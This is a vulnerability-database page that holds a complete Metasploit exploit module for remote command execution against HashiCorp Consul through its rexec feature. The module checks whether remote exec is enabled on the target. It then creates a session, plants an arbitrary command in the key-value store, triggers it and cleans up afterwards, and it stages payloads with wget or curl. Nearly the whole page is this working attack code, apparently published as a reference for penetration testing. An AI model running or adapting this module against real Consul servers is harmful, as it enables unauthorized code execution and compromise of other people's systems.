Vulners
Lucene search
Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info={})
super(update_info(info,
'Name' => "Hashicorp Consul Remote Command Execution via Rexec",
'Description' => %q{
This module exploits a feature of Hashicorp Consul named rexec.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Bharadwaj Machiraju <bharadwaj.machiraju[at]gmail.com>', # Discovery and PoC
'Francis Alexander <helofrancis[at]gmail.com>', # Discovery and PoC
'Quentin Kaiser <kaiserquentin[at]gmail.com>' # Metasploit module
],
'References' =>
[
[ 'URL', 'https://www.consul.io/docs/agent/options.html#disable_remote_exec' ],
[ 'URL', 'https://www.consul.io/docs/commands/exec.html'],
[ 'URL', 'https://github.com/torque59/Garfield' ]
],
'Platform' => 'linux',
'Targets' => [ [ 'Linux', {} ] ],
'Payload' => {},
'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf', 'wget', 'curl' ],
'Privileged' => false,
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 11 2018'))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path', '/']),
OptBool.new('SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]),
OptInt.new('TIMEOUT', [false, 'The timeout to use when waiting for the command to trigger', 20]),
OptString.new('ACL_TOKEN', [false, 'Consul Agent ACL token', '']),
Opt::RPORT(8500)
])
end
def check
uri = target_uri.path
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "/v1/agent/self"),
'headers' => {
'X-Consul-Token' => datastore['ACL_TOKEN']
}
})
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
begin
agent_info = JSON.parse(res.body)
if agent_info["Config"]["DisableRemoteExec"] == false || agent_info["DebugConfig"]["DisableRemoteExec"] == false
return CheckCode::Vulnerable
else
return CheckCode::Safe
end
rescue JSON::ParserError
vprint_error 'Failed to parse JSON output.'
return CheckCode::Unknown
end
end
def execute_command(cmd, opts = {})
uri = target_uri.path
print_status('Creating session.')
res = send_request_cgi({
'method' => 'PUT',
'uri' => normalize_uri(uri, 'v1/session/create'),
'headers' => {
'X-Consul-Token' => datastore['ACL_TOKEN']
},
'ctype' => 'application/json',
'data' => {:Behavior => "delete", :Name => "Remote Exec", :TTL => "15s"}.to_json
})
if res and res.code == 200
begin
sess = JSON.parse(res.body)
print_status("Got rexec session ID #{sess['ID']}")
rescue JSON::ParseError
fail_with(Failure::Unknown, 'Failed to parse JSON output.')
end
end
print_status("Setting command for rexec session #{sess['ID']}")
res = send_request_cgi({
'method' => 'PUT',
'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/job?acquire=#{sess['ID']}"),
'headers' => {
'X-Consul-Token' => datastore['ACL_TOKEN']
},
'ctype' => 'application/json',
'data' => {:Command => "#{cmd}", :Wait => 2000000000}.to_json
})
if res and not res.code == 200 or res.body == 'false'
fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
end
print_status("Triggering execution on rexec session #{sess['ID']}")
res = send_request_cgi({
'method' => 'PUT',
'uri' => normalize_uri(uri, "v1/event/fire/_rexec"),
'headers' => {
'X-Consul-Token' => datastore['ACL_TOKEN']
},
'ctype' => 'application/json',
'data' => {:Prefix => "_rexec", :Session => "#{sess['ID']}"}.to_json
})
if res and not res.code == 200
fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
end
begin
Timeout.timeout(datastore['TIMEOUT']) do
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/?keys=&wait=2000ms"),
'headers' => {
'X-Consul-Token' => datastore['ACL_TOKEN']
}
})
begin
data = JSON.parse(res.body)
break if data.include? 'out'
rescue JSON::ParseError
fail_with(Failure::Unknown, 'Failed to parse JSON output.')
end
sleep 2
end
rescue Timeout::Error
# we catch this error so cleanup still happen afterwards
print_status("Timeout hit, error with payload ?")
end
print_status("Cleaning up rexec session #{sess['ID']}")
res = send_request_cgi({
'method' => 'PUT',
'uri' => normalize_uri(uri, "v1/session/destroy/#{sess['ID']}"),
'headers' => {
'X-Consul-Token' => datastore['ACL_TOKEN']
}
})
if res and not res.code == 200 or res.body == 'false'
fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
end
res = send_request_cgi({
'method' => 'DELETE',
'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}?recurse="),
'headers' => {
'X-Consul-Token' => datastore['ACL_TOKEN']
}
})
if res and not res.code == 200 or res.body == 'false'
fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.')
end
end
def exploit
execute_cmdstager()
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Jan 2019 00:00Current
7.4High risk
Vulners AI Score7.4